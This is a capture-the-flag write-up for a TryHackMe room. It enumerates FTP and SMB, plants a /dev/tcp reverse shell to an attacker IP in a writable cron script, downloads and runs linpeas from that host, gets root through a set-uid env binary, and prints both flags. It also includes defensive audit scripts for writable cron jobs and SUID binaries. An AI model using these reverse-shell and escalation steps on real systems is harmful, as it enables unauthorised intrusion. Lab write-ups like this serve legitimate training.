A quite minimalistic CTF from tryhackme.com. Let's dive right in:
What does nmap say?
sudo nmap -sV 10.10.51.126
There we have the first answers to the challenge: four services are running, among them FTP on port 21 and SMB on ports 139 and 445.
Now we need to look at the SMB shares:
smbclient -L 10.10.51.126
Next answer: the share we are looking for is pics.
Now we are looking for the flags.
Let’s see what ftp can do for us.
ftp 10.10.51.126
Anonymous login works.
That looks good: three files, all readable, and the shell script is also writable. Let's download them and take a look.
get clean.sh
get removed_files.log
get to_do.txt
to_do.txt only tells us that the admin is planning to block anonymous access. Good idea, but it doesn't help us here.
So let's cat removed_files.log:
cat removed_files.log
Not too interesting either.
Let’s move on to the bash script.
cat clean.sh
Now things are beginning to make sense.
clean.sh writes into removed_files.log. Knowing that there were a lot of lines in the log file, we can assume that clean.sh is run automatically and periodically by a cron job.
We also know that we can write to the file. So let's just plant a reverse shell into that script, set up netcat on our side and see if we get a shell once the cron job fires on the target.
#!/bin/bash
exec 5<>/dev/tcp/10.11.30.88/1234
cat <&5 | while read line; do $line 2>&5 >&5; done
And in our FTP session:
put clean.sh clean.sh
On our local machine we start our usual netcat listener:
nc -l 1234
and wait …
And here we go. Let’s look around.
whoami
pwd
ls -la
We found the user flag:
90d6f992585815ff991e68748c414740
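From the defender's side, the root cause of this foothold is a script that cron runs with elevated rights but that a low-privilege account (here: anonymous FTP) is allowed to edit. The following audit helper is an added example, not the author's code or anything from the room: it parses a crontab in /etc/crontab format, picks out the script each job runs, reports those writable by group or others, and shows the one-line remediation. The crontab and scripts it creates in a temporary directory are constructed for the demonstration.

```shell
#!/bin/bash
# Audit helper added for this write-up (not the author's code): find cron jobs
# whose script can be modified by group or other users. Such a script runs
# with the cron owner's privileges the next time the job fires, which is
# exactly the weakness the FTP-writable clean.sh exposed.

writable_cron_scripts() {
    local crontab_file="$1" script perms
    # Skip comment and blank lines. In /etc/crontab format fields 1-5 are the
    # schedule and field 6 the user; print the first absolute path after that.
    awk '$1 ~ /^#/ { next }
         NF == 0 { next }
         { for (i = 6; i <= NF; i++) if ($i ~ /^\//) { print $i; break } }' "$crontab_file" |
    while read -r script; do
        [ -f "$script" ] || continue
        # Permission string such as -rwsr-xr-x: character 6 is group write,
        # character 9 is other write (ls output is parsed for portability).
        perms=$(ls -ld "$script" | cut -c1-10)
        case "$perms" in
            ?????w*|????????w?) echo "$script" ;;
        esac
    done
}

# Remediation: strip the group/other write bits so only the owner can edit.
lock_down_script() {
    chmod go-w "$1"
}

# Constructed sample: one world-writable script (like clean.sh) and one with
# sane permissions, both referenced from a crontab in a temporary directory.
make_sample_crontab() {
    local dir
    dir=$(mktemp -d)
    printf '#!/bin/sh\nrm -f /tmp/*.tmp >> /var/log/removed_files.log\n' > "$dir/clean.sh"
    printf '#!/bin/sh\necho backup done\n' > "$dir/backup.sh"
    chmod 666 "$dir/clean.sh"
    chmod 755 "$dir/backup.sh"
    printf '# m h dom mon dow user command\n' > "$dir/crontab"
    printf '* * * * * root %s\n' "$dir/clean.sh" >> "$dir/crontab"
    printf '0 2 * * * root %s\n' "$dir/backup.sh" >> "$dir/crontab"
    echo "$dir"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(make_sample_crontab)
    echo "Writable cron scripts referenced by $d/crontab:"
    writable_cron_scripts "$d/crontab"
    lock_down_script "$d/clean.sh"
    echo "After chmod go-w: $(writable_cron_scripts "$d/crontab" | wc -l) hit(s)"
fi
```

Run it with `--demo` to see the constructed sample; against a real host, point `writable_cron_scripts` at /etc/crontab and each file in /etc/cron.d. The same check, extended to the directory the FTP server exposes, would have flagged this box before the room was ever published.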
To get ideas on how to become root, let's use linpeas.
We start a web server locally and transfer the script to our target.
So on our local machine:
python3 -m http.server
And on the target machine:
wget http://10.11.30.88:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
In the SUID section we find this line:
-rwsr-xr-x 1 root root 35K Jan 18 2018 /usr/bin/env
With this we find an entry on GTFOBins:
https://gtfobins.github.io/gtfobins/env/#suid
From there we use:
env /bin/sh -p
and we are root.
whoami
root
cat /root/root.txt
So our root flag is:
4d930091c31a622a7ed10f27999af363
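The escalation above works only because env carries the set-uid bit, which it never needs. The following audit helper is an added example, not the author's code: it walks a directory tree, reports set-uid executables whose name is on a short watch-list of programs that run arbitrary commands for their caller, and drops the bit as remediation. The watch-list and the sample tree it builds in a temporary directory are assumptions constructed for the demonstration.

```shell
#!/bin/bash
# Audit helper added for this write-up (not the author's code): list set-uid
# executables under a directory tree whose name is on a short watch-list of
# programs that execute arbitrary commands for the caller. The write-up's
# /usr/bin/env with the s bit is the textbook case. The watch-list is an
# assumption for the example, not a complete catalogue.

SUID_WATCHLIST="env sh bash dash"

suid_watchlist_hits() {
    local root="$1" file name w
    # -perm -4000: the set-uid bit is set, whatever the other bits are
    find "$root" -type f -perm -4000 2>/dev/null | while read -r file; do
        name=$(basename "$file")
        for w in $SUID_WATCHLIST; do
            if [ "$name" = "$w" ]; then
                echo "$file"
                break
            fi
        done
    done
}

# Remediation: env has no legitimate need for set-uid; drop the bit.
drop_suid() {
    chmod u-s "$1"
}

# Constructed sample tree: a set-uid "env" (the finding) next to a normal
# binary, so the audit has something to catch without touching the real system.
make_sample_tree() {
    local dir
    dir=$(mktemp -d)
    printf '#!/bin/sh\nexec /usr/bin/env "$@"\n' > "$dir/env"
    printf '#!/bin/sh\nexec /bin/ls "$@"\n' > "$dir/ls"
    chmod 4755 "$dir/env"
    chmod 755 "$dir/ls"
    echo "$dir"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(make_sample_tree)
    echo "Set-uid watch-list hits under $d:"
    suid_watchlist_hits "$d"
    drop_suid "$d/env"
    echo "After chmod u-s: $(suid_watchlist_hits "$d" | wc -l) hit(s)"
fi
```

On a real host, run `suid_watchlist_hits /` as root and compare the output with the package manager's expected set-uid list; anything outside that list deserves the same `chmod u-s` treatment and a look at who added it.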